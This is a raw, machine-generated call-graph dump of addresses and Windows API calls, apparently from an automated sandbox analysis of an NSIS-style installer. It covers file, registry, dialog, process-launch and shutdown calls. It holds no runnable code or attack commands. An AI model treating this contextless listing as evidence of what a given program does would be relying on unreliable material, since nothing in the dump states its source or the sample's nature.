4369->4371 4378 40519f 4369->4378 4372 405172 4370->4372 4380 4051c9 4370->4380 4373 405195 4371->4373 4371->4380 4375 404191 SendMessageA 4372->4375 4377 404a98 5 API calls 4373->4377 4374 4051ce CallWindowProcA 4376 40517c 4374->4376 4375->4376 4377->4378 4378->4374 4379 404b18 4 API calls 4378->4379 4379->4380 4380->4374 4381 40275d 4382 402763 4381->4382 4383 402a5a 4382->4383 4384 40276b FindClose 4382->4384 4384->4383 4385 406a5d 4386 406642 4385->4386 4387 406fad 4386->4387 4388 4066c3 GlobalFree 4386->4388 4389 4066cc GlobalAlloc 4386->4389 4390 406743 GlobalAlloc 4386->4390 4391 40673a GlobalFree 4386->4391 4388->4389 4389->4386 4389->4387 4390->4386 4390->4387 4391->4390 4392 401a5e 4393 402bac 17 API calls 4392->4393 4394 401a67 4393->4394 4395 402bac 17 API calls 4394->4395 4396 401a0e 4395->4396 4397 4029de 4398 4064ca 5 API calls 4397->4398 4399 4029e5 4398->4399 4400 402bce 17 API calls 4399->4400 4401 4029ee 4400->4401 4403 402a2a 4401->4403 4407 406114 4401->4407 4404 4029fc 4404->4403 4411 4060fe 4404->4411 4408 40611f 4407->4408 4409 406142 IIDFromString 4408->4409 4410 40613b 4408->4410 4409->4404 4410->4404 4414 4060e3 WideCharToMultiByte 4411->4414 4413 402a1d CoTaskMemFree 4413->4403 4414->4413 4415 4028df 4416 4028e2 4415->4416 4417 402925 4416->4417 4418 40290e 4416->4418 4424 4027bf 4416->4424 4421 40293f 4417->4421 4422 40292f 4417->4422 4419 402922 4418->4419 4420 402913 4418->4420 4429 40601f wsprintfA 4419->4429 4428 4060c1 lstrcpynA 4420->4428 4425 406154 17 API calls 4421->4425 4423 402bac 17 API calls 4422->4423 4423->4424 4425->4424 4428->4424 4429->4424 4430 700d102d 4431 700d1096 71 API calls 4430->4431 4432 700d1058 4431->4432 4433 4023e0 4434 402bce 17 API calls 4433->4434 4435 4023f1 4434->4435 4436 402bce 17 API calls 4435->4436 4437 4023fa 4436->4437 4438 402bce 17 API calls 4437->4438 4439 402404 GetPrivateProfileStringA 4438->4439 4440 401563 4441 4029a5 4440->4441 4444 40601f wsprintfA 4441->4444 4443 4029aa 4444->4443 4445 401b63 4446 402bce 17 API calls 4445->4446 4447 401b6a 4446->4447 4448 402bac 17 API calls 4447->4448 4449 401b73 wsprintfA 4448->4449 4450 402a5a 4449->4450 4451 401d65 4452 401d78 GetDlgItem 4451->4452 4453 401d6b 4451->4453 4455 401d72 4452->4455 4454 402bac 17 API calls 4453->4454 4454->4455 4456 401db9 GetClientRect LoadImageA SendMessageA 4455->4456 4458 402bce 17 API calls 4455->4458 4459 401e1a 4456->4459 4461 401e26 4456->4461 4458->4456 4460 401e1f DeleteObject 4459->4460 4459->4461 4460->4461 4462 40166a 4463 402bce 17 API calls 4462->4463 4464 401671 4463->4464 4465 402bce 17 API calls 4464->4465 4466 40167a 4465->4466 4467 402bce 17 API calls 4466->4467 4468 401683 MoveFileA 4467->4468 4469 401696 4468->4469 4475 40168f 4468->4475 4470 406435 2 API calls 4469->4470 4472 4022e2 4469->4472 4473 4016a5 4470->4473 4471 401423 24 API calls 4471->4472 4473->4472 4474 405ea0 36 API calls 4473->4474 4474->4475 4475->4471 4476 40216b 4477 402bce 17 API calls 4476->4477 4478 402172 4477->4478 4479 402bce 17 API calls 4478->4479 4480 40217c 4479->4480 4481 402bce 17 API calls 4480->4481 4482 402186 4481->4482 4483 402bce 17 API calls 4482->4483 4484 402193 4483->4484 4485 402bce 17 API calls 4484->4485 4486 40219d 4485->4486 4487 4021df CoCreateInstance 4486->4487 4488 402bce 17 API calls 4486->4488 4491 4021fe 4487->4491 4493 4022ac 4487->4493 4488->4487 4489 401423 24 API calls 4490 4022e2 4489->4490 4492 40228c MultiByteToWideChar 4491->4492 4491->4493 4492->4493 4493->4489 4493->4490 4494 4022eb 4495 402bce 17 API calls 4494->4495 4496 4022f1 4495->4496 4497 402bce 17 API calls 4496->4497 4498 4022fa 4497->4498 4499 402bce 17 API calls 4498->4499 4500 402303 4499->4500 4501 406435 2 API calls 4500->4501 4502 40230c 4501->4502 4503 402310 4502->4503 4504 40231d lstrlenA lstrlenA 4502->4504 4505 4051e8 24 API calls 4503->4505 4507 402318 4503->4507 4506 4051e8 24 API calls 4504->4506 4505->4507 4508 402359 SHFileOperationA 4506->4508 4508->4503 4508->4507 4509 40236d 4510 402374 4509->4510 4513 402387 4509->4513 4511 406154 17 API calls 4510->4511 4512 402381 4511->4512 4514 4057dd MessageBoxIndirectA 4512->4514 4514->4513 4515 40266d 4516 402bac 17 API calls 4515->4516 4517 402677 4516->4517 4518 405cd2 ReadFile 4517->4518 4519 4026e7 4517->4519 4520 4026f7 4517->4520 4523 4026e5 4517->4523 4518->4517 4524 40601f wsprintfA 4519->4524 4522 40270d SetFilePointer 4520->4522 4520->4523 4522->4523 4524->4523 4525 4019ed 4526 402bce 17 API calls 4525->4526 4527 4019f4 4526->4527 4528 402bce 17 API calls 4527->4528 4529 4019fd 4528->4529 4530 401a04 lstrcmpiA 4529->4530 4531 401a16 lstrcmpA 4529->4531 4532 401a0a 4530->4532 4531->4532 4533 700d19a3 GetCommandLineA lstrcpynA 4534 700d19f7 4533->4534 4535 700d1a17 CharNextA 4534->4535 4536 700d1a0e CharNextA 4534->4536 4537 700d1a1c CreateProcessA 4535->4537 4536->4534 4539 700d1a77 ExitProcess 4537->4539 4540 700d1a46 WaitForSingleObject GetExitCodeProcess CloseHandle CloseHandle ExitProcess 4537->4540 4541 40156f 4542 401586 4541->4542 4543 40157f ShowWindow 4541->4543 4544 401594 ShowWindow 4542->4544 4545 402a5a 4542->4545 4543->4542 4544->4545 3539 403c71 3540 403dc4 3539->3540 3541 403c89 3539->3541 3543 403e15 3540->3543 3544 403dd5 GetDlgItem GetDlgItem 3540->3544 3541->3540 3542 403c95 3541->3542 3545 403ca0 SetWindowPos 3542->3545 3546 403cb3 3542->3546 3548 403e6f 3543->3548 3557 401389 2 API calls 3543->3557 3547 404145 18 API calls 3544->3547 3545->3546 3550 403cd0 3546->3550 3551 403cb8 ShowWindow 3546->3551 3552 403dff SetClassLongA 3547->3552 3549 404191 SendMessageA 3548->3549 3553 403dbf 3548->3553 3579 403e81 3549->3579 3554 403cf2 3550->3554 3555 403cd8 DestroyWindow 3550->3555 3551->3550 3556 40140b 2 API calls 3552->3556 3559 403cf7 SetWindowLongA 3554->3559 3560 403d08 3554->3560 3558 4040ce 3555->3558 3556->3543 3561 403e47 3557->3561 3558->3553 3568 4040ff ShowWindow 3558->3568 3559->3553 3565 403db1 3560->3565 3566 403d14 GetDlgItem 3560->3566 3561->3548 3562 403e4b SendMessageA 3561->3562 3562->3553 3563 40140b 2 API calls 3563->3579 3564 4040d0 DestroyWindow EndDialog 3564->3558 3567 4041ac 8 API calls 3565->3567 3569 403d44 3566->3569 3570 403d27 SendMessageA IsWindowEnabled 3566->3570 3567->3553 3568->3553 3572 403d51 3569->3572 3573 403d98 SendMessageA 3569->3573 3574 403d64 3569->3574 3583 403d49 3569->3583 3570->3553 3570->3569 3571 406154 17 API calls 3571->3579 3572->3573 3572->3583 3573->3565 3576 403d81 3574->3576 3577 403d6c 3574->3577 3575 40411e SendMessageA 3578 403d7f 3575->3578 3581 40140b 2 API calls 3576->3581 3616 40140b 3577->3616 3578->3565 3579->3553 3579->3563 3579->3564 3579->3571 3582 404145 18 API calls 3579->3582 3585 404145 18 API calls 3579->3585 3601 404010 DestroyWindow 3579->3601 3584 403d88 3581->3584 3582->3579 3583->3575 3584->3565 3584->3583 3586 403efc GetDlgItem 3585->3586 3587 403f11 3586->3587 3588 403f19 ShowWindow KiUserCallbackDispatcher 3586->3588 3587->3588 3610 404167 KiUserCallbackDispatcher 3588->3610 3590 403f43 EnableWindow 3595 403f57 3590->3595 3591 403f5c GetSystemMenu EnableMenuItem SendMessageA 3592 403f8c SendMessageA 3591->3592 3591->3595 3592->3595 3595->3591 3611 40417a SendMessageA 3595->3611 3612 403c52 3595->3612 3615 4060c1 lstrcpynA 3595->3615 3597 403fbb lstrlenA 3598 406154 17 API calls 3597->3598 3599 403fcc SetWindowTextA 3598->3599 3600 401389 2 API calls 3599->3600 3600->3579 3601->3558 3602 40402a CreateDialogParamA 3601->3602 3602->3558 3603 40405d 3602->3603 3604 404145 18 API calls 3603->3604 3605 404068 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3604->3605 3606 401389 2 API calls 3605->3606 3607 4040ae 3606->3607 3607->3553 3608 4040b6 ShowWindow 3607->3608 3609 404191 SendMessageA 3608->3609 3609->3558 3610->3590 3611->3595 3613 406154 17 API calls 3612->3613 3614 403c60 SetWindowTextA 3613->3614 3614->3595 3615->3597 3617 401389 2 API calls 3616->3617 3618 401420 3617->3618 3618->3583 4553 4014f4 SetForegroundWindow 4554 402a5a 4553->4554 4562 402476 4563 402bce 17 API calls 4562->4563 4564 402488 4563->4564 4565 402bce 17 API calls 4564->4565 4566 402492 4565->4566 4579 402c5e 4566->4579 4569 402a5a 4570 4024c7 4573 402bac 17 API calls 4570->4573 4575 4024d3 4570->4575 4571 402bce 17 API calls 4572 4024c0 lstrlenA 4571->4572 4572->4570 4573->4575 4574 4024f5 RegSetValueExA 4577 40250b RegCloseKey 4574->4577 4575->4574 4576 4030d8 35 API calls 4575->4576 4576->4574 4577->4569 4580 402c79 4579->4580 4583 405f75 4580->4583 4584 405f84 4583->4584 4585 4024a2 4584->4585 4586 405f8f RegCreateKeyExA 4584->4586 4585->4569 4585->4570 4585->4571 4586->4585 4587 402777 4588 40277d 4587->4588 4589 402781 FindNextFileA 4588->4589 4592 402793 4588->4592 4590 4027d2 4589->4590 4589->4592 4593 4060c1 lstrcpynA 4590->4593 4593->4592 4594 401ef9 4595 402bce 17 API calls 4594->4595 4596 401eff 4595->4596 4597 402bce 17 API calls 4596->4597 4598 401f08 4597->4598 4599 402bce 17 API calls 4598->4599 4600 401f11 4599->4600 4601 402bce 17 API calls 4600->4601 4602 401f1a 4601->4602 4603 401423 24 API calls 4602->4603 4604 401f21 4603->4604 4611 4057a3 ShellExecuteExA 4604->4611 4606 401f5c 4609 4027bf 4606->4609 4612 40653f WaitForSingleObject 4606->4612 4608 401f76 CloseHandle 4608->4609 4611->4606 4613 406559 4612->4613 4614 40656b GetExitCodeProcess 4613->4614 4615 406506 2 API calls 4613->4615 4614->4608 4616 406560 WaitForSingleObject 4615->4616 4616->4613 4092 401ffb 4093 402bce 17 API calls 4092->4093 4094 402002 4093->4094 4095 4064ca 5 API calls 4094->4095 4096 402011 GetFileVersionInfoSizeA 4095->4096 4097 402029 GlobalAlloc 4096->4097 4098 402a5a 4096->4098 4097->4098 4099 40203d 4097->4099 4100 4064ca 5 API calls 4099->4100 4101 402044 4100->4101 4102 4064ca 5 API calls 4101->4102 4104 40204e 4102->4104 4103 402091 4103->4098 4104->4103 4108 40601f wsprintfA 4104->4108 4106 402085 4109 40601f wsprintfA 4106->4109 4108->4106 4109->4103 4617 40427b lstrcpynA lstrlenA 4618 401f7b 4619 402bce 17 API calls 4618->4619 4620 401f81 4619->4620 4621 4051e8 24 API calls 4620->4621 4622 401f8b 4621->4622 4623 405760 2 API calls 4622->4623 4624 401f91 4623->4624 4625 4027bf 4624->4625 4626 40653f 5 API calls 4624->4626 4629 401fb2 CloseHandle 4624->4629 4628 401fa6 4626->4628 4628->4629 4631 40601f wsprintfA 4628->4631 4629->4625 4631->4629 4639 4018fd 4640 401934 4639->4640 4641 402bce 17 API calls 4640->4641 4642 401939 4641->4642 4643 405889 67 API calls 4642->4643 4644 401942 4643->4644 4645 401000 4646 401037 BeginPaint GetClientRect 4645->4646 4647 40100c DefWindowProcA 4645->4647 4648 4010f3 4646->4648 4650 401179 4647->4650 4651 401073 CreateBrushIndirect FillRect DeleteObject 4648->4651 4652 4010fc 4648->4652 4651->4648 4653 401102 CreateFontIndirectA 4652->4653 4654 401167 EndPaint 4652->4654 4653->4654 4655 401112 6 API calls 4653->4655 4654->4650 4655->4654 4656 401900 4657 402bce 17 API calls 4656->4657 4658 401907 4657->4658 4659 4057dd MessageBoxIndirectA 4658->4659 4660 401910 4659->4660 4661 401502 4662 40150a 4661->4662 4664 40151d 4661->4664 4663 402bac 17 API calls 4662->4663 4663->4664 4665 402604 4666 402bce 17 API calls 4665->4666 4667 40260b 4666->4667 4670 405c5a GetFileAttributesA CreateFileA 4667->4670 4669 402617 4670->4669 4671 401b87 4672 401b94 4671->4672 4673 401bd8 4671->4673 4674 401c1c 4672->4674 4679 401bab 4672->4679 4675 401c01 GlobalAlloc 4673->4675 4676 401bdc 4673->4676 4677 406154 17 API calls 4674->4677 4689 402387 4674->4689 4678 406154 17 API calls 4675->4678 4676->4689 4692 4060c1 lstrcpynA 4676->4692 4680 402381 4677->4680 4678->4674 4690 4060c1 lstrcpynA 4679->4690 4685 4057dd MessageBoxIndirectA 4680->4685 4683 401bee GlobalFree 4683->4689 4684 401bba 4691 4060c1 lstrcpynA 4684->4691 4685->4689 4687 401bc9 4693 4060c1 lstrcpynA 4687->4693 4690->4684 4691->4687 4692->4683 4693->4689 4694 402588 4704 402c0e 4694->4704 4697 402bac 17 API calls 4698 40259b 4697->4698 4699 4025c2 RegEnumValueA 4698->4699 4700 4025b6 RegEnumKeyA 4698->4700 4702 4027bf 4698->4702 4701 4025d7 RegCloseKey 4699->4701 4700->4701 4701->4702 4705 402bce 17 API calls 4704->4705 4706 402c25 4705->4706 4707 405f47 RegOpenKeyExA 4706->4707 4708 402592 4707->4708 4708->4697 4716 404590 4717 4045a0 4716->4717 4718 4045c6 4716->4718 4719 404145 18 API calls 4717->4719 4720 4041ac 8 API calls 4718->4720 4721 4045ad SetDlgItemTextA 4719->4721 4722 4045d2 4720->4722 4721->4718 4723 401490 4724 4051e8 24 API calls 4723->4724 4725 401497 4724->4725 3619 403312 SetErrorMode GetVersion 3620 403353 3619->3620 3621 403359 3619->3621 3622 4064ca 5 API calls 3620->3622 3709 40645c GetSystemDirectoryA 3621->3709 3622->3621 3624 40336f lstrlenA 3624->3621 3625 40337e 3624->3625 3712 4064ca GetModuleHandleA 3625->3712 3628 4064ca 5 API calls 3629 40338c 3628->3629 3630 4064ca 5 API calls 3629->3630 3631 403398 #17 OleInitialize SHGetFileInfoA 3630->3631 3718 4060c1 lstrcpynA 3631->3718 3634 4033e4 GetCommandLineA 3719 4060c1 lstrcpynA 3634->3719 3636 4033f6 3637 405a84 CharNextA 3636->3637 3638 40341f CharNextA 3637->3638 3647 40342f 3638->3647 3639 4034f9 3640 40350c GetTempPathA 3639->3640 3720 4032e1 3640->3720 3642 403524 3644 403528 GetWindowsDirectoryA lstrcatA 3642->3644 3645 40357e DeleteFileA 3642->3645 3643 405a84 CharNextA 3643->3647 3648 4032e1 12 API calls 3644->3648 3730 402ea1 GetTickCount GetModuleFileNameA 3645->3730 3647->3639 3647->3643 3650 4034fb 3647->3650 3649 403544 3648->3649 3649->3645 3652 403548 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3649->3652 3814 4060c1 lstrcpynA 3650->3814 3651 403592 3658 405a84 CharNextA 3651->3658 3691 403618 3651->3691 3704 403628 3651->3704 3654 4032e1 12 API calls 3652->3654 3656 403576 3654->3656 3656->3645 3656->3704 3660 4035ad 3658->3660 3669 4035f3 3660->3669 3670 403658 3660->3670 3661 403760 3663 4037e2 ExitProcess 3661->3663 3664 403768 GetCurrentProcess OpenProcessToken 3661->3664 3662 403642 3838 4057dd 3662->3838 3666 4037b3 3664->3666 3667 403783 LookupPrivilegeValueA AdjustTokenPrivileges 3664->3667 3674 4064ca 5 API calls 3666->3674 3667->3666 3815 405b47 3669->3815 3842 405748 3670->3842 3686 4037ba 3674->3686 3677 403679 lstrcatA lstrcmpiA 3681 403695 3677->3681 3677->3704 3678 40366e lstrcatA 3678->3677 3679 4037cf ExitWindowsEx 3679->3663 3682 4037db 3679->3682 3684 4036a1 3681->3684 3685 40369a 3681->3685 3687 40140b 2 API calls 3682->3687 3683 40360d 3830 4060c1 lstrcpynA 3683->3830 3850 40572b CreateDirectoryA 3684->3850 3845 4056ae CreateDirectoryA 3685->3845 3686->3679 3686->3682 3687->3663 3758 4038d4 3691->3758 3693 4036a6 SetCurrentDirectoryA 3694 4036c0 3693->3694 3695 4036b5 3693->3695 3854 4060c1 lstrcpynA 3694->3854 3853 4060c1 lstrcpynA 3695->3853 3698 406154 17 API calls 3699 4036ff DeleteFileA 3698->3699 3700 40370c CopyFileA 3699->3700 3706 4036ce 3699->3706 3700->3706 3701 403754 3703 405ea0 36 API calls 3701->3703 3703->3704 3831 4037fa 3704->3831 3705 406154 17 API calls 3705->3706 3706->3698 3706->3701 3706->3705 3708 403740 CloseHandle 3706->3708 3855 405ea0 MoveFileExA 3706->3855 3859 405760 CreateProcessA 3706->3859 3708->3706 3710 40647e wsprintfA LoadLibraryExA 3709->3710 3710->3624 3713 4064f0 GetProcAddress 3712->3713 3714 4064e6 3712->3714 3716 403385 3713->3716 3715 40645c 3 API calls 3714->3715 3717 4064ec 3715->3717 3716->3628 3717->3713 3717->3716 3718->3634 3719->3636 3721 40639c 5 API calls 3720->3721 3723 4032ed 3721->3723 3722 4032f7 3722->3642 3723->3722 3862 405a59 lstrlenA CharPrevA 3723->3862 3726 40572b 2 API calls 3727 403305 3726->3727 3728 405c89 2 API calls 3727->3728 3729 403310 3728->3729 3729->3642 3865 405c5a GetFileAttributesA CreateFileA 3730->3865 3732 402ee1 3752 402ef1 3732->3752 3866 4060c1 lstrcpynA 3732->3866 3734 402f07 3867 405aa0 lstrlenA 3734->3867 3738 402f18 GetFileSize 3739 403012 3738->3739 3757 402f2f 3738->3757 3872 402e3d 3739->3872 3741 40301b 3743 40304b GlobalAlloc 3741->3743 3741->3752 3908 4032ca SetFilePointer 3741->3908 3883 4032ca SetFilePointer 3743->3883 3744 40307e 3749 402e3d 6 API calls 3744->3749 3747 403034 3750 4032b4 ReadFile 3747->3750 3748 403066 3884 4030d8 3748->3884 3749->3752 3753 40303f 3750->3753 3752->3651 3753->3743 3753->3752 3754 402e3d 6 API calls 3754->3757 3755 403072 3755->3752 3755->3755 3756 4030af SetFilePointer 3755->3756 3756->3752 3757->3739 3757->3744 3757->3752 3757->3754 3905 4032b4 3757->3905 3759 4064ca 5 API calls 3758->3759 3760 4038e8 3759->3760 3761 403900 3760->3761 3762 4038ee 3760->3762 3763 405fa8 3 API calls 3761->3763 3933 40601f wsprintfA 3762->3933 3764 40392b 3763->3764 3766 403949 lstrcatA 3764->3766 3768 405fa8 3 API calls 3764->3768 3767 4038fe 3766->3767 3925 403b99 3767->3925 3768->3766 3771 405b47 18 API calls 3772 40397b 3771->3772 3773 403a04 3772->3773 3775 405fa8 3 API calls 3772->3775 3774 405b47 18 API calls 3773->3774 3776 403a0a 3774->3776 3782 4039a7 3775->3782 3777 403a1a LoadImageA 3776->3777 3778 406154 17 API calls 3776->3778 3779 403ac0 3777->3779 3780 403a41 RegisterClassA 3777->3780 3778->3777 3784 40140b 2 API calls 3779->3784 3783 403a77 SystemParametersInfoA CreateWindowExA 3780->3783 3813 403aca 3780->3813 3781 4039c3 lstrlenA 3786 4039d1 lstrcmpiA 3781->3786 3787 4039f7 3781->3787 3782->3773 3782->3781 3785 405a84 CharNextA 3782->3785 3783->3779 3788 403ac6 3784->3788 3789 4039c1 3785->3789 3786->3787 3790 4039e1 GetFileAttributesA 3786->3790 3791 405a59 3 API calls 3787->3791 3793 403b99 18 API calls 3788->3793 3788->3813 3789->3781 3792 4039ed 3790->3792 3794 4039fd 3791->3794 3792->3787 3795 405aa0 2 API calls 3792->3795 3796 403ad7 3793->3796 3934 4060c1 lstrcpynA 3794->3934 3795->3787 3798 403ae3 ShowWindow 3796->3798 3799 403b66 3796->3799 3800 40645c 3 API calls 3798->3800 3801 4052ba 5 API calls 3799->3801 3802 403afb 3800->3802 3803 403b6c 3801->3803 3804 403b09 GetClassInfoA 3802->3804 3807 40645c 3 API calls 3802->3807 3805 403b70 3803->3805 3806 403b88 3803->3806 3809 403b33 DialogBoxParamA 3804->3809 3810 403b1d GetClassInfoA RegisterClassA 3804->3810 3811 40140b 2 API calls 3805->3811 3805->3813 3808 40140b 2 API calls 3806->3808 3807->3804 3808->3813 3812 40140b 2 API calls 3809->3812 3810->3809 3811->3813 3812->3813 3813->3704 3814->3640 3936 4060c1 lstrcpynA 3815->3936 3817 405b58 3937 405af2 CharNextA CharNextA 3817->3937 3820 4035fe 3820->3704 3829 4060c1 lstrcpynA 3820->3829 3821 40639c 5 API calls 3827 405b6e 3821->3827 3822 405b99 lstrlenA 3823 405ba4 3822->3823 3822->3827 3824 405a59 3 API calls 3823->3824 3826 405ba9 GetFileAttributesA 3824->3826 3826->3820 3827->3820 3827->3822 3828 405aa0 2 API calls 3827->3828 3943 406435 FindFirstFileA 3827->3943 3828->3822 3829->3683 3830->3691 3832 403812 3831->3832 3833 403804 CloseHandle 3831->3833 3946 40383f 3832->3946 3833->3832 3839 4057f2 3838->3839 3840 403650 ExitProcess 3839->3840 3841 405806 MessageBoxIndirectA 3839->3841 3841->3840 3843 4064ca 5 API calls 3842->3843 3844 40365d lstrcatA 3843->3844 3844->3677 3844->3678 3846 40369f 3845->3846 3847 4056ff GetLastError 3845->3847 3846->3693 3847->3846 3848 40570e SetFileSecurityA 3847->3848 3848->3846 3849 405724 GetLastError 3848->3849 3849->3846 3851 40573b 3850->3851 3852 40573f GetLastError 3850->3852 3851->3693 3852->3851 3853->3694 3854->3706 3856 405ec1 3855->3856 3857 405eb4 3855->3857 3856->3706 4003 405d30 3857->4003 3860 405793 CloseHandle 3859->3860 3861 40579f 3859->3861 3860->3861 3861->3706 3863 405a73 lstrcatA 3862->3863 3864 4032ff 3862->3864 3863->3864 3864->3726 3865->3732 3866->3734 3868 405aad 3867->3868 3869 405ab2 CharPrevA 3868->3869 3870 402f0d 3868->3870 3869->3868 3869->3870 3871 4060c1 lstrcpynA 3870->3871 3871->3738 3873 402e46 3872->3873 3874 402e5e 3872->3874 3875 402e56 3873->3875 3876 402e4f DestroyWindow 3873->3876 3877 402e66 3874->3877 3878 402e6e GetTickCount 3874->3878 3875->3741 3876->3875 3909 406506 3877->3909 3880 402e7c CreateDialogParamA ShowWindow 3878->3880 3881 402e9f 3878->3881 3880->3881 3881->3741 3883->3748 3885 4030ee 3884->3885 3886 403119 3885->3886 3922 4032ca SetFilePointer 3885->3922 3888 4032b4 ReadFile 3886->3888 3889 403124 3888->3889 3890 403254 3889->3890 3891 403136 GetTickCount 3889->3891 3895 40323e 3889->3895 3892 403258 3890->3892 3894 403270 3890->3894 3903 403149 3891->3903 3893 4032b4 ReadFile 3892->3893 3893->3895 3894->3895 3896 4032b4 ReadFile 3894->3896 3898 405d01 WriteFile 3894->3898 3895->3755 3896->3894 3897 4032b4 ReadFile 3897->3903 3898->3894 3900 4031af GetTickCount 3900->3903 3901 4031d8 MulDiv wsprintfA 3902 4051e8 24 API calls 3901->3902 3902->3903 3903->3895 3903->3897 3903->3900 3903->3901 3913 40660f 3903->3913 3920 405d01 WriteFile 3903->3920 3923 405cd2 ReadFile 3905->3923 3908->3747 3910 406523 PeekMessageA 3909->3910 3911 402e6c 3910->3911 3912 406519 DispatchMessageA 3910->3912 3911->3741 3912->3910 3914 406634 3913->3914 3915 40663c 3913->3915 3914->3903 3915->3914 3916 4066c3 GlobalFree 3915->3916 3917 4066cc GlobalAlloc 3915->3917 3918 406743 GlobalAlloc 3915->3918 3919 40673a GlobalFree 3915->3919 3916->3917 3917->3914 3917->3915 3918->3914 3918->3915 3919->3918 3921 405d1f 3920->3921 3921->3903 3922->3886 3924 4032c7 3923->3924 3924->3757 3926 403bad 3925->3926 3935 40601f wsprintfA 3926->3935 3928 403c1e 3929 403c52 18 API calls 3928->3929 3931 403c23 3929->3931 3930 403959 3930->3771 3931->3930 3932 406154 17 API calls 3931->3932 3932->3931 3933->3767 3934->3773 3935->3928 3936->3817 3938 405b1d 3937->3938 3939 405b0d 3937->3939 3941 405a84 CharNextA 3938->3941 3942 405b3d 3938->3942 3939->3938 3940 405b18 CharNextA 3939->3940 3940->3942 3941->3938 3942->3820 3942->3821 3944 406456 3943->3944 3945 40644b FindClose 3943->3945 3944->3827 3945->3944 3947 40384d 3946->3947 3948 403817 3947->3948 3949 403852 FreeLibrary GlobalFree 3947->3949 3950 405889 3948->3950 3949->3948 3949->3949 3951 405b47 18 API calls 3950->3951 3952 4058a9 3951->3952 3953 4058b1 DeleteFileA 3952->3953 3954 4058c8 3952->3954 3955 403631 OleUninitialize 3953->3955 3956 4059f6 3954->3956 3990 4060c1 lstrcpynA 3954->3990 3955->3661 3955->3662 3956->3955 3961 406435 2 API calls 3956->3961 3958 4058ee 3959 405901 3958->3959 3960 4058f4 lstrcatA 3958->3960 3963 405aa0 2 API calls 3959->3963 3962 405907 3960->3962 3965 405a1a 3961->3965 3964 405915 lstrcatA 3962->3964 3966 405920 lstrlenA FindFirstFileA 3962->3966 3963->3962 3964->3966 3965->3955 3967 405a1e 3965->3967 3966->3956 3968 405944 3966->3968 3969 405a59 3 API calls 3967->3969 3970 405a84 CharNextA 3968->3970 3977 4059d5 FindNextFileA 3968->3977 3986 405996 3968->3986 3991 4060c1 lstrcpynA 3968->3991 3971 405a24 3969->3971 3970->3968 3972 405841 5 API calls 3971->3972 3973 405a30 3972->3973 3974 405a34 3973->3974 3975 405a4a 3973->3975 3974->3955 3980 4051e8 24 API calls 3974->3980 3976 4051e8 24 API calls 3975->3976 3976->3955 3977->3968 3979 4059ed FindClose 3977->3979 3979->3956 3981 405a41 3980->3981 3982 405ea0 36 API calls 3981->3982 3985 405a48 3982->3985 3984 405889 60 API calls 3984->3986 3985->3955 3986->3977 3986->3984 3987 4051e8 24 API calls 3986->3987 3988 4051e8 24 API calls 3986->3988 3989 405ea0 36 API calls 3986->3989 3992 405841 3986->3992 3987->3977 3988->3986 3989->3986 3990->3958 3991->3968 4000 405c35 GetFileAttributesA 3992->4000 3995 405864 DeleteFileA 3997 40586a 3995->3997 3996 40585c RemoveDirectoryA 3996->3997 3998 40586e 3997->3998 3999 40587a SetFileAttributesA 3997->3999 3998->3986 3999->3998 4001 40584d 4000->4001 4002 405c47 SetFileAttributesA 4000->4002 4001->3995 4001->3996 4001->3998 4002->4001 4004 405d56 4003->4004 4005 405d7c GetShortPathNameA 4003->4005 4030 405c5a GetFileAttributesA CreateFileA 4004->4030 4007 405d91 4005->4007 4008 405e9b 4005->4008 4007->4008 4009 405d99 wsprintfA 4007->4009 4008->3856 4011 406154 17 API calls 4009->4011 4010 405d60 CloseHandle GetShortPathNameA 4010->4008 4012 405d74 4010->4012 4013 405dc1 4011->4013 4012->4005 4012->4008 4031 405c5a GetFileAttributesA CreateFileA 4013->4031 4015 405dce 4015->4008 4016 405ddd GetFileSize GlobalAlloc 4015->4016 4017 405e94 CloseHandle 4016->4017 4018 405dff 4016->4018 4017->4008 4019 405cd2 ReadFile 4018->4019 4020 405e07 4019->4020 4020->4017 4032 405bbf lstrlenA 4020->4032 4023 405e32 4025 405bbf 4 API calls 4023->4025 4024 405e1e lstrcpyA 4027 405e40 4024->4027 4025->4027 4026 405e77 SetFilePointer 4028 405d01 WriteFile 4026->4028 4027->4026 4029 405e8d GlobalFree 4028->4029 4029->4017 4030->4010 4031->4015 4033 405c00 lstrlenA 4032->4033 4034 405c08 4033->4034 4035 405bd9 lstrcmpiA 4033->4035 4034->4023 4034->4024 4035->4034 4036 405bf7 CharNextA 4035->4036 4036->4033 4726 403892 4727 40389d 4726->4727 4728 4038a1 4727->4728 4729 4038a4 GlobalAlloc 4727->4729 4729->4728 4730 402516 4731 402c0e 17 API calls 4730->4731 4732 402520 4731->4732 4733 402bce 17 API calls 4732->4733 4734 402529 4733->4734 4735 402533 RegQueryValueExA 4734->4735 4740 4027bf 4734->4740 4736 402559 RegCloseKey 4735->4736 4737 402553 4735->4737 4736->4740 4737->4736 4741 40601f wsprintfA 4737->4741 4741->4736 4133 40239c 4134 4023a4 4133->4134 4135 4023aa 4133->4135 4137 402bce 17 API calls 4134->4137 4136 4023ba 4135->4136 4138 402bce 17 API calls 4135->4138 4139 4023c8 4136->4139 4140 402bce 17 API calls 4136->4140 4137->4135 4138->4136 4141 402bce 17 API calls 4139->4141 4140->4139 4142 4023d1 WritePrivateProfileStringA 4141->4142 4143 40209d 4144 40215d 4143->4144 4145 4020af 4143->4145 4147 401423 24 API calls 4144->4147 4146 402bce 17 API calls 4145->4146 4148 4020b6 4146->4148 4153 4022e2 4147->4153 4149 402bce 17 API calls 4148->4149 4150 4020bf 4149->4150 4151 4020d4 LoadLibraryExA 4150->4151 4152 4020c7 GetModuleHandleA 4150->4152 4151->4144 4154 4020e4 GetProcAddress 4151->4154 4152->4151 4152->4154 4155 402130 4154->4155 4156 4020f3 4154->4156 4158 4051e8 24 API calls 4155->4158 4157 402103 4156->4157 4159 401423 24 API calls 4156->4159 4157->4153 4160 402151 FreeLibrary 4157->4160 4158->4157 4159->4157 4160->4153 4745 40149d 4746 402387 4745->4746 4747 4014ab PostQuitMessage 4745->4747 4747->4746 4748 40159d 4749 402bce 17 API calls 4748->4749 4750 4015a4 SetFileAttributesA 4749->4750 4751 4015b6 4750->4751 4161 401a1e 4162 402bce 17 API calls 4161->4162 4163 401a27 ExpandEnvironmentStringsA 4162->4163 4164 401a3b 4163->4164 4166 401a4e 4163->4166 4165 401a40 lstrcmpA 4164->4165 4164->4166 4165->4166 4757 40171f 4758 402bce 17 API calls 4757->4758 4759 401726 SearchPathA 4758->4759 4760 401741 4759->4760 4761 401d1f 4762 402bac 17 API calls 4761->4762 